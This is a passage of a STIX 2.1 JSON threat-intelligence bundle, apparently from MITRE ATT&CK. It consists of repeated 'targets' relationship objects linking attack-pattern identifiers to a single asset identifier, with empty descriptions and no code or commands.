"x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c82050ec-1d95-4474-bada-a2209b6eb757", "created": "2024-07-01T10:37:15.838895", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838897", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a3d2aee7-b72d-4f50-b30d-016fb3762797", "created": "2024-07-01T10:37:15.838904", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838906", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d1a53439-1546-4cfc-aa6d-e7158a34a096", "created": "2024-07-01T10:37:15.838913", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838915", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6b9dc2e3-1e3f-48a9-a0d1-ceb508aeda49", "created": "2024-07-01T10:37:15.838923", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838925", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f813a70f-ccbe-47b0-85cb-d36ae04a6e45", "created": "2024-07-01T10:37:15.838932", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838934", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--49325dc4-9c37-4c50-9e99-624593121bf8", "created": "2024-07-01T10:37:15.838942", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838944", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fa295225-977a-47c8-8009-95414f7ed5dd", "created": "2024-07-01T10:37:15.838951", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838953", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--78a1b079-f95f-4fee-b862-4d696b6f844a", "created": "2024-07-01T10:37:15.838961", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838963", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--41d9edec-4fcf-46aa-9165-af443fcacb6f", "created": "2024-07-01T10:37:15.838970", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838972", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e70cc6a4-eb02-4f5f-b9e4-314117cf696c", "created": "2024-07-01T10:37:15.838979", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838981", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1b061fe0-067c-4a5f-a8e3-6d7ba060228b", "created": "2024-07-01T10:37:15.838989", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838991", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1eb3613e-6e5b-42a1-be84-f0710ddcc71a", "created": "2024-07-01T10:37:15.838998", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839000", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d919dd51-87b7-42b6-b256-98311ca68451", "created": "2024-07-01T10:37:15.839008", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839010", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d273434a-448e-4598-8e14-607f4a0d5e27", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--308cf173-49a7-4d98-b82d-0df2f7e5a158", "created": "2024-07-01T10:37:15.839017", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839019", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--730aafbd-72b4-4774-926d-c0757f1caae3", "created": "2024-07-01T10:37:15.839027", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839029", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--db0c693b-343e-4908-ab8e-6e9bcc32536d", "created": "2024-07-01T10:37:15.839036", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839038", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d336b553-5da9-46ca-98a8-0b23f49fb447", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--50ecc865-71c8-4006-a980-57555129cfd6", "created": "2024-07-01T10:37:15.839046", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839048", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--12291347-91f3-456f-a85c-918d2a0137fb", "created": "2024-07-01T10:37:15.839056", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839058", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6b32182e-3c60-4cf6-a372-c8c25addae71", "created": "2024-07-01T10:37:15.839065", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839067", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--652f9b57-3ce2-48ae-8563-1554e2bebae2", "created": "2024-07-01T10:37:15.839075", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839077", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6a16df65-dc8e-45a8-acc0-ff99d73def29", "created": "2024-07-01T10:37:15.839084", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839086", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2e51b4f7-b2ce-4561-9820-661d1870bf4f", "created": "2024-07-01T10:37:15.839094", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839096", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--10724abb-550d-4678-b466-46efad0fe45b", "created": "2024-07-01T10:37:15.839105", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839107", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8b9c25b1-fb8c-47b2-9b86-c41579fa8033", "created": "2024-07-01T10:37:15.839114", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839116", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1eed722f-4af1-480a-b7e6-2a122d412147", "created": "2024-07-01T10:37:15.839124", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839126", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a85839ab-aeb9-4090-8e3f-798550769d99", "created": "2024-07-01T10:37:15.839133", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839135", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--15c536a1-7739-4747-b263-25fef0a508ca", "created": "2024-07-01T10:37:15.839156", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839158", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fa219215-c8f7-4f2c-8626-aa9cf5125cea", "created": "2024-07-01T10:37:15.839165", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839167", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7dc33a43-4f1d-4510-8bd6-21b2f7f120df", "created": "2024-07-01T10:37:15.839174", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839176", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--41b36c8d-bcda-4541-ac30-173cc10bb1c8", "created": "2024-07-01T10:37:15.839184", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839185", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--497d1d30-105d-4f49-82e4-7cc5d0273af1", "created": "2024-07-01T10:37:15.839193", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839195", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f80861b5-2341-416a-b835-15815c5dff94", "created": "2024-07-01T10:37:15.839202", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839204", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--12f1b2c0-adf6-45c8-bf8b-a3a385d31d7d", "created": "2024-07-01T10:37:15.839211", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839213", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--80f88e0d-7eca-4581-90ce-a94e8e83528a", "created": "2024-07-01T10:37:15.839220", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839222", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9b57eeb9-26c1-4c94-9d8d-815b07ca5da1", "created": "2024-07-01T10:37:15.839229", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839231", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a6096f5c-a52e-44e9-afdd-1aa1ddf83bdc", "created": "2024-07-01T10:37:15.839238", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839240", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e0033c16-a07e-48aa-8204-7c3ca669998c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c04a2d70-2b91-4bf6-b013-9ae28220b97e", "created": "2024-07-01T10:37:15.839247", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839249", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--950ccd97-904f-46c2-b885-ae8085b91774", "created": "2024-07-01T10:37:15.839257", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839258", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5f94048d-32b3-4138-935c-dbcd6f5f5b89", "created": "2024-07-01T10:37:15.839266", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839268", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d64f29c7-c8a5-4b7b-b33a-fea0083a74fa", "created": "2024-07-01T10:37:15.839275", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839277", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d600d690-62b0-4820-b4fc-90f91cf7a0e5", "created": "2024-07-01T10:37:15.839284", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839286", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, 